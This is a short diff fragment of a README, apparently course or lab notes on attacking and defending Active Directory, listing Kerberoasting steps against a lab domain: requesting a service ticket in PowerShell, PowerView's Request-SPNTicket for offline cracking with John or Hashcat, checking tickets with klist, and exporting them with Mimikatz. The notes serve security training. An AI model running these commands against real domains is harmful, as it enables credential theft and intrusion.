nirajkharel/AttackingAndDefendingAD/README.md

   - `New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"`

 - `Request-SPNTicket` from PowerView can be used as well for cracking with John or Hashcat.

+- Check if the TGS has been granted
+  - `klist`
+- Export all tickets using Mimikatz
+  -  `Invoke-Mimikatz -Command '"kerberos::list /export"'`